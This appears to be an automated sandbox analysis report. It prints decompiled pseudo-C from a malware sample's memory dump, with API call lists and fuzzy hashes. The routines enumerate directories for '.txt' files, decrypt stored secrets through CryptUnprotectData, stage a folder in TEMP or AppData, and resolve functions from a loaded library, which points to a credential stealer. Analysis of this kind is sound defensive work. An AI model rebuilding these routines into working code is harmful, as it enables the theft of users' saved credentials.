                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$CloseCopyCountFirstFreeNextStringTick
                                                                                                                                                                                              • String ID: .txt$\*.*
                                                                                                                                                                                              • API String ID: 4269597168-2615687548
                                                                                                                                                                                              • Opcode ID: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                              • Instruction ID: 6859e3562032d776fa84e591ecfbf3afacee5e694faebf3c1d1cda20f45b7b98
                                                                                                                                                                                              • Opcode Fuzzy Hash: 5eb2d59efa555ee89ed57af41da6cad216739ef9bb024f3ea898b5bc55f5b5a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C810C7490021DABDF10EB51CC85BCDB77AEF84304F6041E6A608B62A2DB799F858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E0041158C(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                              				char _v620;
                                                                                                                                                                                              				intOrPtr _v624;
                                                                                                                                                                                              				char _v628;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				char _v640;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				intOrPtr _v660;
                                                                                                                                                                                              				char _v664;
                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                              				void* _t113;
                                                                                                                                                                                              				intOrPtr _t115;
                                                                                                                                                                                              				intOrPtr _t130;
                                                                                                                                                                                              				intOrPtr _t144;
                                                                                                                                                                                              				intOrPtr _t148;
                                                                                                                                                                                              				intOrPtr _t149;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t146 = __esi;
                                                                                                                                                                                              				_t145 = __edi;
                                                                                                                                                                                              				_t113 = __ebx + 1;
                                                                                                                                                                                              				 *((intOrPtr*)(__eax)) =  *((intOrPtr*)(__eax)) + __eax;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t148 = _t149;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t115 = 0x52;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t115 = _t115 - 1;
                                                                                                                                                                                              				} while (_t115 != 0);
                                                                                                                                                                                              				_t3 =  &_v8;
                                                                                                                                                                                              				 *_t3 = _t115;
                                                                                                                                                                                              				_push(_t113);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t3;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				_push(_t148);
                                                                                                                                                                                              				_push(0x4117df);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t149;
                                                                                                                                                                                              				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                              				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push(0x411808);
                                                                                                                                                                                              					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              					_push(_v628);
                                                                                                                                                                                              					_push(0x411808);
                                                                                                                                                                                              					E0040813C(0x1f,  &_v632);
                                                                                                                                                                                              					_push(_v632);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					if(E004076B0(_v624, _t113, 0x104) != 0) {
                                                                                                                                                                                              						_push(_t148);
                                                                                                                                                                                              						_push(0x411753);
                                                                                                                                                                                              						_push( *[fs:eax]);
                                                                                                                                                                                              						 *[fs:eax] = _t149;
                                                                                                                                                                                              						_push(_v8);
                                                                                                                                                                                              						_push(0x411808);
                                                                                                                                                                                              						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              						_push(_v648);
                                                                                                                                                                                              						_push(0x411808);
                                                                                                                                                                                              						E0040813C(0x1f,  &_v652);
                                                                                                                                                                                              						_push(_v652);
                                                                                                                                                                                              						E00403E1C();
                                                                                                                                                                                              						E00410900(_v644, _t113,  &_v640, _t145, _t146);
                                                                                                                                                                                              						E0040377C( &_v636, _v640);
                                                                                                                                                                                              						_push(_v636);
                                                                                                                                                                                              						_push(_v16);
                                                                                                                                                                                              						_push(0x411808);
                                                                                                                                                                                              						_push(_v12);
                                                                                                                                                                                              						_push(E00411810);
                                                                                                                                                                                              						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              						_push(_v664);
                                                                                                                                                                                              						_push(L".txt");
                                                                                                                                                                                              						E00403E1C();
                                                                                                                                                                                              						E0040377C( &_v656, _v660);
                                                                                                                                                                                              						_pop(_t109);
                                                                                                                                                                                              						E0040DCE8(_t109, _t113, _v656, _t145, _t146);
                                                                                                                                                                                              						_pop(_t144);
                                                                                                                                                                                              						 *[fs:eax] = _t144;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                              				FindClose(_v24);
                                                                                                                                                                                              				_pop(_t130);
                                                                                                                                                                                              				 *[fs:eax] = _t130;
                                                                                                                                                                                              				_push(E004117E6);
                                                                                                                                                                                              				E00403B98( &_v664, 2);
                                                                                                                                                                                              				E004034E4( &_v656);
                                                                                                                                                                                              				E00403B98( &_v652, 4);
                                                                                                                                                                                              				E004034E4( &_v636);
                                                                                                                                                                                              				E00403B98( &_v632, 4);
                                                                                                                                                                                              				return E00403B98( &_v16, 3);
                                                                                                                                                                                              			}


                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                              • String ID: .txt$\*.*
                                                                                                                                                                                              • API String ID: 2008072091-2615687548
                                                                                                                                                                                              • Opcode ID: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                              • Instruction ID: cb1fa36ef6bd00d28df09069f3f2ad3b15c2d413a197645ac6dab8893c9dac73
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0f6dccddeca5cc831589218911d3f92bb29d96b4250bcad063a90af0a6f30303
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D514C7490411DABDF10EB61CC45BDDB779EF45304F2085FAA608B22A2DA389F858F18
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 45%
                                                                                                                                                                                              			E00411590(char __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				void* _v24;
                                                                                                                                                                                              				struct _WIN32_FIND_DATAW _v616;
                                                                                                                                                                                              				char _v620;
                                                                                                                                                                                              				intOrPtr _v624;
                                                                                                                                                                                              				char _v628;
                                                                                                                                                                                              				char _v632;
                                                                                                                                                                                              				char _v636;
                                                                                                                                                                                              				char _v640;
                                                                                                                                                                                              				char _v644;
                                                                                                                                                                                              				char _v648;
                                                                                                                                                                                              				char _v652;
                                                                                                                                                                                              				char _v656;
                                                                                                                                                                                              				intOrPtr _v660;
                                                                                                                                                                                              				char _v664;
                                                                                                                                                                                              				void* _t107;
                                                                                                                                                                                              				intOrPtr _t112;
                                                                                                                                                                                              				intOrPtr _t127;
                                                                                                                                                                                              				intOrPtr _t141;
                                                                                                                                                                                              				intOrPtr _t145;
                                                                                                                                                                                              				intOrPtr _t146;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t143 = __esi;
                                                                                                                                                                                              				_t142 = __edi;
                                                                                                                                                                                              				_t110 = __ebx;
                                                                                                                                                                                              				_t145 = _t146;
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t112 = 0x52;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t112 = _t112 - 1;
                                                                                                                                                                                              				} while (_t112 != 0);
                                                                                                                                                                                              				_t1 =  &_v8;
                                                                                                                                                                                              				 *_t1 = _t112;
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_push(__edi);
                                                                                                                                                                                              				_v16 =  *_t1;
                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                              				_v8 = __eax;
                                                                                                                                                                                              				E004040F4( &_v8);
                                                                                                                                                                                              				E004040F4( &_v12);
                                                                                                                                                                                              				E004040F4( &_v16);
                                                                                                                                                                                              				_push(_t145);
                                                                                                                                                                                              				_push(0x4117df);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t146;
                                                                                                                                                                                              				E00403DB8( &_v620, L"\\*.*", _v8, 0);
                                                                                                                                                                                              				_v24 = FindFirstFileW(E00403D3C(_v620),  &_v616);
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(_v8);
                                                                                                                                                                                              					_push(0x411808);
                                                                                                                                                                                              					E00403D10( &_v628, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              					_push(_v628);
                                                                                                                                                                                              					_push(0x411808);
                                                                                                                                                                                              					E0040813C(0x1f,  &_v632);
                                                                                                                                                                                              					_push(_v632);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					if(E004076B0(_v624, _t110, 0x104) != 0) {
                                                                                                                                                                                              						_push(_t145);
                                                                                                                                                                                              						_push(0x411753);
                                                                                                                                                                                              						_push( *[fs:eax]);
                                                                                                                                                                                              						 *[fs:eax] = _t146;
                                                                                                                                                                                              						_push(_v8);
                                                                                                                                                                                              						_push(0x411808);
                                                                                                                                                                                              						E00403D10( &_v648, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              						_push(_v648);
                                                                                                                                                                                              						_push(0x411808);
                                                                                                                                                                                              						E0040813C(0x1f,  &_v652);
                                                                                                                                                                                              						_push(_v652);
                                                                                                                                                                                              						E00403E1C();
                                                                                                                                                                                              						E00410900(_v644, _t110,  &_v640, _t142, _t143);
                                                                                                                                                                                              						E0040377C( &_v636, _v640);
                                                                                                                                                                                              						_push(_v636);
                                                                                                                                                                                              						_push(_v16);
                                                                                                                                                                                              						_push(0x411808);
                                                                                                                                                                                              						_push(_v12);
                                                                                                                                                                                              						_push(E00411810);
                                                                                                                                                                                              						E00403D10( &_v664, 0x104,  &(_v616.cFileName));
                                                                                                                                                                                              						_push(_v664);
                                                                                                                                                                                              						_push(L".txt");
                                                                                                                                                                                              						E00403E1C();
                                                                                                                                                                                              						E0040377C( &_v656, _v660);
                                                                                                                                                                                              						_pop(_t107);
                                                                                                                                                                                              						E0040DCE8(_t107, _t110, _v656, _t142, _t143);
                                                                                                                                                                                              						_pop(_t141);
                                                                                                                                                                                              						 *[fs:eax] = _t141;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				} while (FindNextFileW(_v24,  &_v616) != 0);
                                                                                                                                                                                              				FindClose(_v24);
                                                                                                                                                                                              				_pop(_t127);
                                                                                                                                                                                              				 *[fs:eax] = _t127;
                                                                                                                                                                                              				_push(E004117E6);
                                                                                                                                                                                              				E00403B98( &_v664, 2);
                                                                                                                                                                                              				E004034E4( &_v656);
                                                                                                                                                                                              				E00403B98( &_v652, 4);
                                                                                                                                                                                              				E004034E4( &_v636);
                                                                                                                                                                                              				E00403B98( &_v632, 4);
                                                                                                                                                                                              				return E00403B98( &_v16, 3);
                                                                                                                                                                                              			}


























                                                                                                                                                                                              0x004116f3
                                                                                                                                                                                              0x004116f6
                                                                                                                                                                                              0x0041170c
                                                                                                                                                                                              0x00411711
                                                                                                                                                                                              0x00411717
                                                                                                                                                                                              0x00411727
                                                                                                                                                                                              0x00411738
                                                                                                                                                                                              0x00411743
                                                                                                                                                                                              0x00411744
                                                                                                                                                                                              0x0041174b
                                                                                                                                                                                              0x0041174e
                                                                                                                                                                                              0x0041174e
                                                                                                                                                                                              0x0041176d
                                                                                                                                                                                              0x00411779
                                                                                                                                                                                              0x00411780
                                                                                                                                                                                              0x00411783
                                                                                                                                                                                              0x00411786
                                                                                                                                                                                              0x00411796
                                                                                                                                                                                              0x004117a1
                                                                                                                                                                                              0x004117b1
                                                                                                                                                                                              0x004117bc
                                                                                                                                                                                              0x004117cc
                                                                                                                                                                                              0x004117de

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000,00000000,?,?,0041237E,00000000,00000000,00000000), ref: 004115FB
                                                                                                                                                                                              • FindNextFileW.KERNEL32(?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000,00000000), ref: 00411768
                                                                                                                                                                                              • FindClose.KERNEL32(?,?,?,?,00411808,?,00411808,0041A69E,00000000,?,00000000,004117DF,?,00000000,0041B0FC,00000000), ref: 00411779
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$File$CloseFirstFreeNextString
                                                                                                                                                                                              • String ID: .txt$\*.*
                                                                                                                                                                                              • API String ID: 2008072091-2615687548
                                                                                                                                                                                              • Opcode ID: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                              • Instruction ID: 05cc79d86d1b55c995a7b8d44de261c7f11cdb27113bd27bc9f6ce20252d4423
                                                                                                                                                                                              • Opcode Fuzzy Hash: f5d4968fc86502ddbcb5c74ae6393bdac5bb8f60082bed19b5c2a5cb9a6abe43
                                                                                                                                                                                              • Instruction Fuzzy Hash: C3514C7490411DABDF50EB61CC45BCDB779EF44304F6085FAA608B32A2DA399F858F58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                                                              			E004094C4(intOrPtr __eax, void* __ecx, char __edx) {
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                              				intOrPtr _v40;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t19 = __ecx;
                                                                                                                                                                                              				_v20 = __edx;
                                                                                                                                                                                              				_v16 = __eax;
                                                                                                                                                                                              				_push( &_v12);
                                                                                                                                                                                              				_push(1);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push(0);
                                                                                                                                                                                              				_push( &_v20);
                                                                                                                                                                                              				if( *0x41c7c8() == 0) {
                                                                                                                                                                                              					return E00403538(__ecx, E0040952C);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E004036DC(__ecx, _v36);
                                                                                                                                                                                              				E00403AC0(_t19, _v40);
                                                                                                                                                                                              				return LocalFree(_v36);
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(00000000,00000000,00000000,00000000,00000000,00000001,?), ref: 004094E5
                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 0040950A
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CryptDataFreeLocalUnprotect
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1561624719-0
                                                                                                                                                                                              • Opcode ID: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                                                                                                              • Instruction ID: 8d19d854ff734d332b2dbdc515c77238868d08609e2067f50d6fa790567ddd23
                                                                                                                                                                                              • Opcode Fuzzy Hash: 7af865200370c71dc1aeec28a3f245545c66ce1c623f0b7719112b5aa0c6dde3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 85F0B4B17043007BD7009E5ACC81B4BB7D8AB84710F10893EB558DB2D2D774D8054B5A
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                                                              			E00404B4C(int __eax, void* __ebx, void* __eflags) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v15;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                              				_push(_t32);
                                                                                                                                                                                              				_push(0x404bb2);
                                                                                                                                                                                              				_push( *[fs:edx]);
                                                                                                                                                                                              				 *[fs:edx] = _t32 + 0xfffffff0;
                                                                                                                                                                                              				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
                                                                                                                                                                                              				E00403748( &_v20, 7,  &_v15);
                                                                                                                                                                                              				E00402988(_v20,  &_v8);
                                                                                                                                                                                              				if(_v8 != 0) {
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_pop(_t29);
                                                                                                                                                                                              				 *[fs:eax] = _t29;
                                                                                                                                                                                              				_push(E00404BB9);
                                                                                                                                                                                              				return E004034E4( &_v20);
                                                                                                                                                                                              			}









                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2299586839-0
                                                                                                                                                                                              • Opcode ID: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                                                                                                              • Instruction ID: e83552b6022aae669f2d5c27f359814ee46eaea323ddb5c136f95371eef2deca
                                                                                                                                                                                              • Opcode Fuzzy Hash: b9dbded4df740f95a366ffb3c725a865bd77cd50a76c54eebdafbaeb84b8c7b9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 0FF0A470A04209AFEB15DE91CC41A9EF7BAF7C4714F40847AA610762C1E7B86A048698
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E00407A34() {
                                                                                                                                                                                              
                                                                                                                                                                                              				return  *[fs:0x30];
                                                                                                                                                                                              			}



                                                                                                                                                                                              0x00407a3b

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                                                                                                              • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                                                                              • Opcode Fuzzy Hash: c2a2d129c8543363c052d008b34330d58e57021dec0e7df0c1a6226ed5b22a4b
                                                                                                                                                                                              • Instruction Fuzzy Hash:
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 72%
                                                                                                                                                                                              			E0040831C(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				char _v12;
                                                                                                                                                                                              				char _v16;
                                                                                                                                                                                              				char _v20;
                                                                                                                                                                                              				char _v24;
                                                                                                                                                                                              				char _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				intOrPtr _v36;
                                                                                                                                                                                              				char _v40;
                                                                                                                                                                                              				char _v44;
                                                                                                                                                                                              				char _v48;
                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                              				char _v56;
                                                                                                                                                                                              				char _v60;
                                                                                                                                                                                              				char _v64;
                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                              				char _v72;
                                                                                                                                                                                              				char _v76;
                                                                                                                                                                                              				char _v80;
                                                                                                                                                                                              				char _v84;
                                                                                                                                                                                              				char _v88;
                                                                                                                                                                                              				char _v92;
                                                                                                                                                                                              				char _v96;
                                                                                                                                                                                              				char _v100;
                                                                                                                                                                                              				char _v104;
                                                                                                                                                                                              				char _v108;
                                                                                                                                                                                              				char _v112;
                                                                                                                                                                                              				intOrPtr _v117;
                                                                                                                                                                                              				void* _t69;
                                                                                                                                                                                              				void* _t96;
                                                                                                                                                                                              				intOrPtr* _t97;
                                                                                                                                                                                              				intOrPtr* _t103;
                                                                                                                                                                                              				intOrPtr* _t108;
                                                                                                                                                                                              				intOrPtr* _t211;
                                                                                                                                                                                              				void* _t226;
                                                                                                                                                                                              				intOrPtr _t244;
                                                                                                                                                                                              				void* _t270;
                                                                                                                                                                                              				intOrPtr _t272;
                                                                                                                                                                                              				intOrPtr _t273;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t269 = __esi;
                                                                                                                                                                                              				 *__eax =  *__eax + __eax;
                                                                                                                                                                                              				_t69 = __eax +  *__eax;
                                                                                                                                                                                              				 *_t69 =  *_t69 + _t69;
                                                                                                                                                                                              				asm("das");
                                                                                                                                                                                              				 *_t69 =  *_t69 + _t69;
                                                                                                                                                                                              				_v117 = _v117 + __edx;
                                                                                                                                                                                              				_t272 = _t273;
                                                                                                                                                                                              				_t226 = 0xd;
                                                                                                                                                                                              				do {
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_t226 = _t226 - 1;
                                                                                                                                                                                              					_t277 = _t226;
                                                                                                                                                                                              				} while (_t226 != 0);
                                                                                                                                                                                              				_push(_t226);
                                                                                                                                                                                              				_push(__ebx);
                                                                                                                                                                                              				_push(__esi);
                                                                                                                                                                                              				_v8 = _t69;
                                                                                                                                                                                              				E00403980(_v8);
                                                                                                                                                                                              				_push(_t272);
                                                                                                                                                                                              				_push(0x408781);
                                                                                                                                                                                              				_push( *[fs:eax]);
                                                                                                                                                                                              				 *[fs:eax] = _t273;
                                                                                                                                                                                              				 *0x41b0d8 = 0;
                                                                                                                                                                                              				E00406C4C( &_v28, 0x41c7bc, __esi);
                                                                                                                                                                                              				E00406258(_v28, 0x41c7bc,  &_v24, __esi, _t277);
                                                                                                                                                                                              				E00406258(_v24, 0x41c7bc,  &_v20, _t269, _t277);
                                                                                                                                                                                              				E00403D2C( &_v16, _v20);
                                                                                                                                                                                              				_push(L"%TEMP%\\");
                                                                                                                                                                                              				_push(_v16);
                                                                                                                                                                                              				_push(0x4087a8);
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				E004062D8(_v36,  &_v32, _t277);
                                                                                                                                                                                              				E00403BBC(0x41c7c0, _v32);
                                                                                                                                                                                              				CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                              				E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t277);
                                                                                                                                                                                              				E0040813C(9,  &_v44);
                                                                                                                                                                                              				E00403DB8( &_v40, _v44,  *0x41c7c0, _t277);
                                                                                                                                                                                              				_t96 = E004076B0(_v40, 0x41c7bc, _v44);
                                                                                                                                                                                              				_t278 = _t96;
                                                                                                                                                                                              				if(_t96 == 0) {
                                                                                                                                                                                              					_push(L"%appdata%\\");
                                                                                                                                                                                              					_push(_v16);
                                                                                                                                                                                              					_push(0x4087a8);
                                                                                                                                                                                              					E00403E1C();
                                                                                                                                                                                              					E004062D8(_v52,  &_v48, _t278);
                                                                                                                                                                                              					E00403BBC(0x41c7c0, _v48);
                                                                                                                                                                                              					CreateDirectoryW(E00403D3C( *0x41c7c0), 0);
                                                                                                                                                                                              					E004081A0( *0x41c7c0, 0x41c7bc, _v8, _t269, _t278);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t97 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                              				_t270 =  *((intOrPtr*)( *_t97))(L"PATH", 0, 0);
                                                                                                                                                                                              				_t279 = _t270;
                                                                                                                                                                                              				if(_t270 > 0) {
                                                                                                                                                                                              					E004040B0( &_v12, _t270);
                                                                                                                                                                                              					_t211 =  *0x41b578; // 0x41c6b0
                                                                                                                                                                                              					 *((intOrPtr*)( *_t211))(L"PATH", E00403D3C(_v12), _t270);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				E00403E1C();
                                                                                                                                                                                              				_t103 =  *0x41b614; // 0x41c6ac
                                                                                                                                                                                              				 *((intOrPtr*)( *_t103))(L"PATH", E00403D3C(_v12), _v12, E004087D8,  *0x41c7c0);
                                                                                                                                                                                              				_t108 =  *0x41b5e4; // 0x41c6b4
                                                                                                                                                                                              				 *((intOrPtr*)( *_t108))(E00403D3C( *0x41c7c0));
                                                                                                                                                                                              				E0040813C(9,  &_v60);
    E00403DB8( &_v56, _v60,  *0x41c7c0, _t279);
    *0x41c7bc = LoadLibraryExW(E00403D3C(_v56), 0, 8);
    if( *0x41c7bc != 0) {
        E00408120(0x84,  &_v64);
        *0x41c784 = GetProcAddress( *0x41c7bc, E00403990(_v64));
        E00408120(0x85,  &_v68);
        *0x41c788 = GetProcAddress( *0x41c7bc, E00403990(_v68));
        E00408120(0x86,  &_v72);
        *0x41c78c = GetProcAddress( *0x41c7bc, E00403990(_v72));
        E00408120(0x87,  &_v76);
        *0x41c790 = GetProcAddress( *0x41c7bc, E00403990(_v76));
        E00408120(0x88,  &_v80);
        *0x41c794 = GetProcAddress( *0x41c7bc, E00403990(_v80));
        E00408120(0x89,  &_v84);
        *0x41c798 = GetProcAddress( *0x41c7bc, E00403990(_v84));
        E00408120(0x8a,  &_v88);
        *0x41c79c = GetProcAddress( *0x41c7bc, E00403990(_v88));
        E00408120(0x12,  &_v92);
        *0x41c7a0 = GetProcAddress( *0x41c7bc, E00403990(_v92));
        E00408120(0x13,  &_v96);
        *0x41c7a4 = GetProcAddress( *0x41c7bc, E00403990(_v96));
        E00408120(0x14,  &_v100);
        *0x41c7a8 = GetProcAddress( *0x41c7bc, E00403990(_v100));
        E00408120(0x15,  &_v104);
        *0x41c7ac = GetProcAddress( *0x41c7bc, E00403990(_v104));
        E00408120(0x16,  &_v108);
        *0x41c7b0 = GetProcAddress( *0x41c7bc, E00403990(_v108));
        E00408120(0x17,  &_v112);
        *0x41c7b4 = GetProcAddress( *0x41c7bc, E00403990(_v112));
        if( *0x41c784 != 0 &&  *0x41c788 != 0 &&  *0x41c78c != 0 &&  *0x41c790 != 0 &&  *0x41c794 != 0 &&  *0x41c798 != 0 &&  *0x41c79c != 0 &&  *0x41c7a0 != 0 &&  *0x41c7a4 != 0 &&  *0x41c7a8 != 0 &&  *0x41c7ac != 0 &&  *0x41c7b0 != 0 &&  *0x41c7b4 != 0) {
            *0x41b0d8 = 1;
        }
    }
    _pop(_t244);
    *[fs:eax] = _t244;
    _push(E00408788);
    E00403508( &_v112, 0xd);
    E00403B98( &_v60, 8);
    E00403508( &_v28, 3);
    E00403B98( &_v16, 2);
    return E004034E4( &_v8);
}











































                                                                                                                                                                                              APIs
